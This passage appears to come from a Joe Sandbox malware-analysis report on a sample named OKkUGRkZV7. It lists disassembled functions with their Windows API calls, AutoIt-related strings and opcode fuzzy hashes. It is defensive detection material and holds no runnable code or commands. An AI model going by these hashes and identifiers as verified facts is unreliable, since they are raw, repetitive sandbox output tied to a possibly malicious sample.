                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              • Opcode ID: 51cec7d80d6afed14f237c0ac160ef401231e93478a246643e3b8a5a98886aa5
                                              • Instruction ID: 4cafddca28b932fca62f5dfe0c4293384709dea2d1d20985f2a2b9c47c628475
                                              • Opcode Fuzzy Hash: 51cec7d80d6afed14f237c0ac160ef401231e93478a246643e3b8a5a98886aa5
                                              • Instruction Fuzzy Hash: 4DD05E9916520978EC1E0720AE0FF7A410CE3D37A2FD18149720ACA0C1FCD06C406130
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00398389), ref: 003987D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: 62fc4445b00a31f26f91c33b9f663af35fd553a28bdec64c6c741757f5c9415a
                                              • Instruction ID: e5519b0abcb716acfb599c30975b98c02981ffdb91e67160a53e5cc97ef2f8b7
                                              • Opcode Fuzzy Hash: 62fc4445b00a31f26f91c33b9f663af35fd553a28bdec64c6c741757f5c9415a
                                              • Instruction Fuzzy Hash: F3D05E3226050EAFEF019EA4DC01EBE3B6AEB04B01F408111FE15C50A1C775E835AB60
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036A12A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 3a05c1f2d67906932a194d85ea3797e36fc41065210813540e99d53e520cab66
                                              • Instruction ID: 12ca8c5472b1c937089a1010175d978ca261ef9d24051b911c9533b9de4ddb52
                                              • Opcode Fuzzy Hash: 3a05c1f2d67906932a194d85ea3797e36fc41065210813540e99d53e520cab66
                                              • Instruction Fuzzy Hash: F1A0113000020CBB8A022B82EC08888BFAEEA802A0B008020F80C800228B32AA208A80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 316002f89f9f53e2d1fea59798b575bdb7bcdab01980e690446c591b6dba4c3f
                                              • Instruction ID: 302e11464f74a596c43f0d280db53d0ec874520fc454104fdb86dc1350eacc6d
                                              • Opcode Fuzzy Hash: 316002f89f9f53e2d1fea59798b575bdb7bcdab01980e690446c591b6dba4c3f
                                              • Instruction Fuzzy Hash: EF221530A04546CBDF2B8B14C494B7C77B5FB01306F2A846ADD86AB9A2DB70DD9AC741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 85380d2d9f2e3314a3db667886187a9941c31b42b9ae8fd72f1966be194b8039
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: 1DC184362055930ADF6F463A847403FFAA15EA27B131F876DD8B3CB5D8EE20C965D620
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: 46fd985755d35655771a00196b6f982ecd054c14570a801d2451a8b5b262341b
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 98C195322055930ADF6F463AC43443FBAA15EA27B131F876DD4B3DB1D9EE50C925E620
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: 59bc2b18b820ebda61efb1d8ccc3551208d34ba4458734af85810cfbdba580bf
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: 92C180322091930ADF6E463AC47413EFBA15EA27B131F876DD4B3CB1D8EE60C965D660
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                              • Instruction ID: 9a85c15d30df190ca92566550650e117e396d58b837e4cf377f1d6a3bed6e452
                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                              • Instruction Fuzzy Hash: 1441D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                              • Instruction ID: 96b17a42e1b938d3a8fe315bbb9d4a537d2b16f3e4ea16ad533e6031ace3060c
                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                              • Instruction Fuzzy Hash: 57019278A11109EFCB84DF98C5909AEF7B9FB48310F208599D909A7301E730AE41DF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                              • Instruction ID: 4b9a822be07e80cf693ead3f506e095d02c49f03556b09427788c31e19cde354
                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                              • Instruction Fuzzy Hash: 70019278A11109EFCB85DF98C5909AEF7B9FB48310F208599E819A7301E730AE41DF84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 003B785B
                                              • DeleteObject.GDI32(00000000), ref: 003B786D
                                              • DestroyWindow.USER32 ref: 003B787B
                                              • GetDesktopWindow.USER32 ref: 003B7895
                                              • GetWindowRect.USER32(00000000), ref: 003B789C
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003B79DD
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003B79ED
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7A35
                                              • GetClientRect.USER32(00000000,?), ref: 003B7A41
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B7A7B
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7A9D
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7AB0
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7ABB
                                              • GlobalLock.KERNEL32(00000000), ref: 003B7AC4
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7AD3
                                              • GlobalUnlock.KERNEL32(00000000), ref: 003B7ADC
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7AE3
                                              • GlobalFree.KERNEL32(00000000), ref: 003B7AEE
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7B00
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003D2CAC,00000000), ref: 003B7B16
                                              • GlobalFree.KERNEL32(00000000), ref: 003B7B26
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003B7B4C
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003B7B6B
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7B8D
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7D7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 8bbe73e111b253dc3188a2c8950c9fba4b7235d751a407b9727d7979d2591f78
                                              • Instruction ID: 1b7f74e86aad24c8ed5175a67d1a2130f0611f602eb1a5967ad2d162ad26fbb9
                                              • Opcode Fuzzy Hash: 8bbe73e111b253dc3188a2c8950c9fba4b7235d751a407b9727d7979d2591f78
                                              • Instruction Fuzzy Hash: AF026A71900115AFDB16DFA8DD89EAE7BB9EF88314F148169F905EB2A1C770AD01CB60
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,003CF910), ref: 003C3627
                                              • IsWindowVisible.USER32(?), ref: 003C364B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: a4fc63a3a559906b5355e4ab35e57c19c545d13e5d5e05eff0ee50e974e4181d
                                              • Instruction ID: f1085496e0613266114fdb343f93de4d2bbe539d113f7bcdbd25b77375f27df4
                                              • Opcode Fuzzy Hash: a4fc63a3a559906b5355e4ab35e57c19c545d13e5d5e05eff0ee50e974e4181d
                                              • Instruction Fuzzy Hash: 4ED159342043019BCA06EF10C852F6EB7E5AF95394F15846DF8869F7A2CB31EE0ACB41
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 003CA630
                                              • GetSysColorBrush.USER32(0000000F), ref: 003CA661
                                              • GetSysColor.USER32(0000000F), ref: 003CA66D
                                              • SetBkColor.GDI32(?,000000FF), ref: 003CA687
                                              • SelectObject.GDI32(?,00000000), ref: 003CA696
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA6C1
                                              • GetSysColor.USER32(00000010), ref: 003CA6C9
                                              • CreateSolidBrush.GDI32(00000000), ref: 003CA6D0
                                              • FrameRect.USER32(?,?,00000000), ref: 003CA6DF
                                              • DeleteObject.GDI32(00000000), ref: 003CA6E6
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 003CA731
                                              • FillRect.USER32(?,?,00000000), ref: 003CA763
                                              • GetWindowLongW.USER32(?,000000F0), ref: 003CA78E
                                                • Part of subcall function 003CA8CA: GetSysColor.USER32(00000012), ref: 003CA903
                                                • Part of subcall function 003CA8CA: SetTextColor.GDI32(?,?), ref: 003CA907
                                                • Part of subcall function 003CA8CA: GetSysColorBrush.USER32(0000000F), ref: 003CA91D
                                                • Part of subcall function 003CA8CA: GetSysColor.USER32(0000000F), ref: 003CA928
                                                • Part of subcall function 003CA8CA: GetSysColor.USER32(00000011), ref: 003CA945
                                                • Part of subcall function 003CA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA953
                                                • Part of subcall function 003CA8CA: SelectObject.GDI32(?,00000000), ref: 003CA964
                                                • Part of subcall function 003CA8CA: SetBkColor.GDI32(?,00000000), ref: 003CA96D
                                                • Part of subcall function 003CA8CA: SelectObject.GDI32(?,?), ref: 003CA97A
                                                • Part of subcall function 003CA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003CA999
                                                • Part of subcall function 003CA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9B0
                                                • Part of subcall function 003CA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9C5
                                                • Part of subcall function 003CA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CA9ED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 3521893082-0
                                              • Opcode ID: 5bf67d7c4f3f0c006d55b9a268a55a028e1fe330d00efb3c7ee9000c1976645e
                                              • Instruction ID: b853a638c549108308d87f039fc350f92147bf49ae5a85ad6d3ee60e56d8fdd3
                                              • Opcode Fuzzy Hash: 5bf67d7c4f3f0c006d55b9a268a55a028e1fe330d00efb3c7ee9000c1976645e
                                              • Instruction Fuzzy Hash: 66917B72008705AFC7129F64DC08E5B7BAEFF89325F144A2DFAA2D61A0D771E944CB52
                                              APIs
                                              • DestroyWindow.USER32(?,?,?), ref: 00342CA2
                                              • DeleteObject.GDI32(00000000), ref: 00342CE8
                                              • DeleteObject.GDI32(00000000), ref: 00342CF3
                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00342CFE
                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00342D09
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0037C43B
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0037C474
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0037C89D
                                                • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                              • SendMessageW.USER32(?,00001053), ref: 0037C8DA
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0037C8F1
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0037C907
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0037C912
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                              • String ID: 0
                                              • API String ID: 464785882-4108050209
                                              • Opcode ID: 17250171daa06b551d17a61189ee2847752ce0c1d403addd7e562f5812d1be6e
                                              • Instruction ID: 00a7050c534aaf453d6ec070f0a15f44c43e06f7d8032e2456cc7940d8ef8ca3
                                              • Opcode Fuzzy Hash: 17250171daa06b551d17a61189ee2847752ce0c1d403addd7e562f5812d1be6e
                                              • Instruction Fuzzy Hash: B0129A30610201AFDB268F24C884BAABBE5FF05310F55956DF999DB662CB35FC42CB91
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 003B74DE
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B759D
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003B75DB
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003B75ED
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003B7633
                                              • GetClientRect.USER32(00000000,?), ref: 003B763F
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003B7683
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B7692
                                              • GetStockObject.GDI32(00000011), ref: 003B76A2
                                              • SelectObject.GDI32(00000000,00000000), ref: 003B76A6
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003B76B6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B76BF
                                              • DeleteDC.GDI32(00000000), ref: 003B76C8
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B76F4
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B770B
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003B7746
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B775A
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B776B
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003B779B
                                              • GetStockObject.GDI32(00000011), ref: 003B77A6
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B77B1
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003B77BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 289825c0720cad17e6156c1ca83e08f7ae3a7d28116be7d8353d9b8eb45f92b5
                                              • Instruction ID: 062dfd013877b560d48c7b35fd47b4489ad88466e723d52f72f3bdcaa28143ab
                                              • Opcode Fuzzy Hash: 289825c0720cad17e6156c1ca83e08f7ae3a7d28116be7d8353d9b8eb45f92b5
                                              • Instruction Fuzzy Hash: 4AA16D71A00605BFEB159BA4DD4AFAB7BAAEF49714F004119FA14EB2E0C770AD00CF64
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 003AAD1E
                                              • GetDriveTypeW.KERNEL32(?,003CFAC0,?,\\.\,003CF910), ref: 003AADFB
                                              • SetErrorMode.KERNEL32(00000000,003CFAC0,?,\\.\,003CF910), ref: 003AAF59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
